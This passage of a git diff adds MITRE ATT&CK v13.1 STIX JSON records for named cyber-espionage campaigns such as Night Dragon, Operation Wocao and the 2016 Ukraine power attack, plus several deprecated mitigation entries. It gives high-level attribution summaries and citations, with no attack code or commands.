[ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8.json new file mode 100644 index 0000000000000000000000000000000000000000..3f552f8237521905f2fdae96e4dfd57ef4cd278b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--4dd547fe-67d0-4c9c-9727-926079e07c25", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-10T16:19:33.560Z", + "name": "FunnyDream", + "description": "[FunnyDream](https://attack.mitre.org/campaigns/C0007) was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign to possible Chinese-speaking threat actors through the use of the [Chinoxy](https://attack.mitre.org/software/S1041) backdoor and noted infrastructure overlap with the TAG-16 threat group.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: Kaspersky APT Trends Q1 2020)(Citation: Recorded Future Chinese Activity in Southeast Asia December 2021)", + "aliases": [ + "FunnyDream" + ], + "first_seen": "2018-07-01T05:00:00.000Z", + "last_seen": "2020-11-01T04:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Kaspersky APT Trends Q1 2020)", + "x_mitre_last_seen_citation": "(Citation: Bitdefender FunnyDream Campaign November 2020)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--8d2bc130-89fe-466e-a4f9-6bce6129c2b8", + "created": "2022-09-20T17:29:09.547Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0007", + "external_id": "C0007" + }, + { + "source_name": "Kaspersky APT Trends Q1 2020", + "description": "Global Research and Analysis Team. (2020, April 30). APT trends report Q1 2020. 
Retrieved September 19, 2022.", + "url": "https://securelist.com/apt-trends-report-q1-2020/96826/" + }, + { + "source_name": "Recorded Future Chinese Activity in Southeast Asia December 2021", + "description": "Insikt Group. (2021, December 8). Chinese State-Sponsored Cyber Espionage Activity Supports Expansion of Regional Power and Influence in Southeast Asia. Retrieved September 19, 2022.", + "url": "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf" + }, + { + "source_name": "Bitdefender FunnyDream Campaign November 2020", + "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--93c23946-49af-41f4-ac03-40f9ffc7419b.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--93c23946-49af-41f4-ac03-40f9ffc7419b.json new file mode 100644 index 0000000000000000000000000000000000000000..9d8a5cbab91894a945156702175dd0d00214bb3b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--93c23946-49af-41f4-ac03-40f9ffc7419b.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--cba28732-0979-4ae3-a021-0f777cbe1686", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:06:05.468Z", + "name": "Operation CuckooBees", + "description": "[Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was conducted by actors affiliated with [Winnti Group](https://attack.mitre.org/groups/G0044), [APT41](https://attack.mitre.org/groups/G0096), and BARIUM.(Citation: Cybereason OperationCuckooBees May 2022)", + "aliases": [ + "Operation CuckooBees" + ], + "first_seen": "2019-12-01T07:00:00.000Z", + "last_seen": "2022-05-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cybereason OperationCuckooBees May 2022)", + "x_mitre_last_seen_citation": "(Citation: Cybereason OperationCuckooBees May 2022)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Andrea Serrano Urea, Telef\u00f3nica Tech" + ], + "type": "campaign", + "id": "campaign--93c23946-49af-41f4-ac03-40f9ffc7419b", + "created": "2022-09-22T20:07:47.208Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0012", + "external_id": "C0012" + }, + { + "source_name": "Cybereason OperationCuckooBees May 2022", + "description": "Cybereason Nocturnus. (2022, May 4). 
Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022.", + "url": "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json new file mode 100644 index 0000000000000000000000000000000000000000..710bec3825c1a4616fbdf61da367fa3d91b82e90 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--aa73efef-1418-4dbe-b43c-87a498e97234.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--626c4e39-d60c-4bf6-8f2d-ef953f699462", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-10T21:18:24.743Z", + "name": "2016 Ukraine Electric Power Attack", + "description": "[2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "aliases": [ + "2016 Ukraine Electric Power Attack" + ], + "first_seen": "2016-12-01T05:00:00.000Z", + "last_seen": "2016-12-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_last_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "created": "2023-03-31T17:22:23.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0025", + "external_id": "C0025" + }, + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. 
Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ab747e62-1bcb-479f-a26b-1cd39d413d81.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ab747e62-1bcb-479f-a26b-1cd39d413d81.json new file mode 100644 index 0000000000000000000000000000000000000000..5bbd3eb9bdfdf09c116eb3d2ceb7d1e399f93ea3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ab747e62-1bcb-479f-a26b-1cd39d413d81.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--af08a825-4cfe-40fc-8029-80bf88dfa8fa", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-04T20:18:28.362Z", + "name": "C0010", + "description": "[C0010](https://attack.mitre.org/campaigns/C0010) was a cyber espionage campaign conducted by UNC3890 that targeted Israeli shipping, government, aviation, energy, and healthcare organizations. Security researcher assess UNC3890 conducts operations in support of Iranian interests, and noted several limited technical connections to Iran, including PDB strings and Farsi language artifacts. [C0010](https://attack.mitre.org/campaigns/C0010) began by at least late 2020, and was still ongoing as of mid-2022.(Citation: Mandiant UNC3890 Aug 2022)", + "aliases": [ + "C0010" + ], + "first_seen": "2020-12-01T07:00:00.000Z", + "last_seen": "2022-08-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Mandiant UNC3890 Aug 2022)", + "x_mitre_last_seen_citation": "(Citation: Mandiant UNC3890 Aug 2022)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--ab747e62-1bcb-479f-a26b-1cd39d413d81", + "created": "2022-09-21T22:16:42.003Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0010", + "external_id": "C0010" + }, + { + "source_name": "Mandiant UNC3890 Aug 2022", + "description": "Mandiant Israel Research Team. (2022, August 17). Suspected Iranian Actor Targeting Israeli Shipping, Healthcare, Government and Energy Sectors. 
Retrieved September 21, 2022.", + "url": "https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ae407e32-87e0-4d92-8705-3ae25d504d8a.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ae407e32-87e0-4d92-8705-3ae25d504d8a.json new file mode 100644 index 0000000000000000000000000000000000000000..f5658736064aa99fec5fcefaa1cb3b2a752f48a5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ae407e32-87e0-4d92-8705-3ae25d504d8a.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a773939f-cfdf-4e07-bf2c-f15d359fb1fc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:45:42.479Z", + "name": "Night Dragon", + "description": "[Night Dragon](https://attack.mitre.org/campaigns/C0002) was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.(Citation: McAfee Night Dragon)", + "aliases": [ + "Night Dragon" + ], + "first_seen": "2009-11-01T04:00:00.000Z", + "last_seen": "2011-02-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: McAfee Night Dragon)", + "x_mitre_last_seen_citation": "(Citation: McAfee Night Dragon)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--ae407e32-87e0-4d92-8705-3ae25d504d8a", + "created": "2022-09-08T13:31:37.391Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0002", + "external_id": "C0002" + }, + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. 
Retrieved February 19, 2018.", + "url": "https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b03d5112-e23a-4ac8-add0-be7502d24eff.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b03d5112-e23a-4ac8-add0-be7502d24eff.json new file mode 100644 index 0000000000000000000000000000000000000000..69b55fddb8466d9f4bc1a0c46869c3b59e40a16a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b03d5112-e23a-4ac8-add0-be7502d24eff.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--da056dd8-8d84-4277-bd96-367519553bec", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:07:13.071Z", + "name": "Operation Wocao", + "description": "[Operation Wocao](https://attack.mitre.org/campaigns/C0014) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.(Citation: FoxIT Wocao December 2019)\n\nSecurity researchers assessed the [Operation Wocao](https://attack.mitre.org/campaigns/C0014) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.(Citation: FoxIT Wocao December 2019)", + "aliases": [ + "Operation Wocao" + ], + "first_seen": "2017-12-01T05:00:00.000Z", + "last_seen": "2019-12-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: FoxIT Wocao December 2019)", + "x_mitre_last_seen_citation": "(Citation: FoxIT Wocao December 2019)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Erik Schamper, @Schamperr, Fox-IT", + "Maarten van Dantzig, @MaartenVDantzig, Fox-IT" + ], + "type": "campaign", + "id": "campaign--b03d5112-e23a-4ac8-add0-be7502d24eff", + "created": "2022-09-27T14:15:23.984Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0014", + "external_id": "C0014" + }, + { + 
"source_name": "FoxIT Wocao December 2019", + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.", + "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b4e5a4a9-f3be-4631-ba8f-da6ebb067fac.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b4e5a4a9-f3be-4631-ba8f-da6ebb067fac.json new file mode 100644 index 0000000000000000000000000000000000000000..916fdb5e0b70937218e4790e3857ce98cf232187 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--b4e5a4a9-f3be-4631-ba8f-da6ebb067fac.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--84db04ab-026a-448c-ab24-9c906737cd78", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:26:23.226Z", + "name": "C0011", + "description": "[C0011](https://attack.mitre.org/campaigns/C0011) was a suspected cyber espionage campaign conducted by [Transparent Tribe](https://attack.mitre.org/groups/G0134) that targeted students at universities and colleges in India. Security researchers noted this campaign against students was a significant shift from [Transparent Tribe](https://attack.mitre.org/groups/G0134)'s historic targeting Indian government, military, and think tank personnel, and assessed it was still ongoing as of July 2022.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) ", + "aliases": [ + "C0011" + ], + "first_seen": "2021-12-01T06:00:00.000Z", + "last_seen": "2022-07-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)", + "x_mitre_last_seen_citation": "(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--b4e5a4a9-f3be-4631-ba8f-da6ebb067fac", + "created": "2022-09-22T17:12:02.893Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0011", + "external_id": "C0011" + }, + { + "source_name": "Cisco Talos Transparent Tribe Education Campaign July 2022", + "description": "N. Baisini. (2022, July 13). Transparent Tribe begins targeting education sector in latest campaign. 
Retrieved September 22, 2022.", + "url": "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ba6dfa37-f401-4140-88b0-8938f2895e61.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ba6dfa37-f401-4140-88b0-8938f2895e61.json new file mode 100644 index 0000000000000000000000000000000000000000..a40f34afd8f88224ac9921743a26c975f0058fce --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--ba6dfa37-f401-4140-88b0-8938f2895e61.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--53074990-55a9-416b-a18b-34dd52178ba9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-01-25T21:02:33.515Z", + "name": "C0017", + "description": "[C0017](https://attack.mitre.org/campaigns/C0017) was an [APT41](https://attack.mitre.org/groups/G0096) campaign conducted between May 2021 and February 2022 that successfully compromised at least six U.S. state government networks through the exploitation of vulnerable Internet facing web applications. During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) was quick to adapt and use publicly-disclosed as well as zero-day vulnerabilities for initial access, and in at least two cases re-compromised victims following remediation efforts. The goals of [C0017](https://attack.mitre.org/campaigns/C0017) are unknown, however [APT41](https://attack.mitre.org/groups/G0096) was observed exfiltrating Personal Identifiable Information (PII).(Citation: Mandiant APT41)", + "aliases": [ + "C0017" + ], + "first_seen": "2021-05-01T04:00:00.000Z", + "last_seen": "2022-02-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Mandiant APT41)", + "x_mitre_last_seen_citation": "(Citation: Mandiant APT41)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "type": "campaign", + "id": "campaign--ba6dfa37-f401-4140-88b0-8938f2895e61", + "created": "2022-12-01T15:40:34.011Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0017", + "external_id": "C0017" + }, + { + "source_name": "Mandiant APT41", + "description": "Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. 
Retrieved July 8, 2022.", + "url": "https://www.mandiant.com/resources/apt41-us-state-governments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--f9cc545e-b0ef-4b92-8884-a3a4427609f6.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--f9cc545e-b0ef-4b92-8884-a3a4427609f6.json new file mode 100644 index 0000000000000000000000000000000000000000..74cd898fa1baed2f77a0808ac607e56e0104db4b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--f9cc545e-b0ef-4b92-8884-a3a4427609f6.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--89ed14ac-9026-478b-8eff-24e10eb4a45b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-05T15:54:36.557Z", + "name": "CostaRicto", + "description": "[CostaRicto](https://attack.mitre.org/campaigns/C0004) was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. [CostaRicto](https://attack.mitre.org/campaigns/C0004) actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.(Citation: BlackBerry CostaRicto November 2020)", + "aliases": [ + "CostaRicto" + ], + "first_seen": "2019-10-01T04:00:00.000Z", + "last_seen": "2020-11-01T04:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: BlackBerry CostaRicto November 2020)", + "x_mitre_last_seen_citation": "(Citation: BlackBerry CostaRicto November 2020)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--f9cc545e-b0ef-4b92-8884-a3a4427609f6", + "created": "2022-09-15T17:25:38.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0004", + "external_id": "C0004" + }, + { + "source_name": "BlackBerry CostaRicto November 2020", + "description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. 
Retrieved May 24, 2021.", + "url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651.json new file mode 100644 index 0000000000000000000000000000000000000000..365581d358a3f51359f4f022182c1890351b944c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--cce4dfbb-8c9f-450e-9f7d-e4711d89cfa1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--00d7d21b-69d6-4797-88a2-c86f3fc97651", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1174", + "external_id": "T1174" + }, + { + "url": "https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx", + "description": "Microsoft. (n.d.). Installing and Registering a Password Filter DLL. Retrieved November 21, 2017.", + "source_name": "Microsoft Install Password Filter n.d" + } + ], + "modified": "2019-07-25T11:22:19.139Z", + "name": "Password Filter DLL Mitigation", + "description": "Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (C:\\Windows\\System32\\ by default) of a domain controller and/or local computer with a corresponding entry in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification Packages. (Citation: Microsoft Install Password Filter n.d)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22.json new file mode 100644 index 0000000000000000000000000000000000000000..20a9678489b4d67e6b344b2f71c8d93d5b2c9689 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--1fb044c9-55d5-484b-a3d9-95ba48163d94", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1151", + "external_id": "T1151" + } + ], + "modified": "2019-07-25T11:46:32.010Z", + "name": "Space after Filename Mitigation", + "description": "Prevent files from having a trailing space after the extension.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330.json new file mode 100644 index 0000000000000000000000000000000000000000..c5e1855f6b73699ab28f91845e3b02ef12fa9b26 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--9fbdc803-3069-43b5-9cdf-47c146864486", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--03c0c586-50ed-45a7-95f4-f496d7eb5330", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1148", + "external_id": "T1148" + }, + { + "url": "http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory", + "description": "Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.", + "source_name": "Securing bash history" + } + ], + "modified": "2019-07-24T19:34:34.065Z", + "name": "HISTCONTROL Mitigation", + "description": "Prevent users from changing the HISTCONTROL environment variable (Citation: Securing bash history). Also, make sure that the HISTCONTROL environment variable is set to 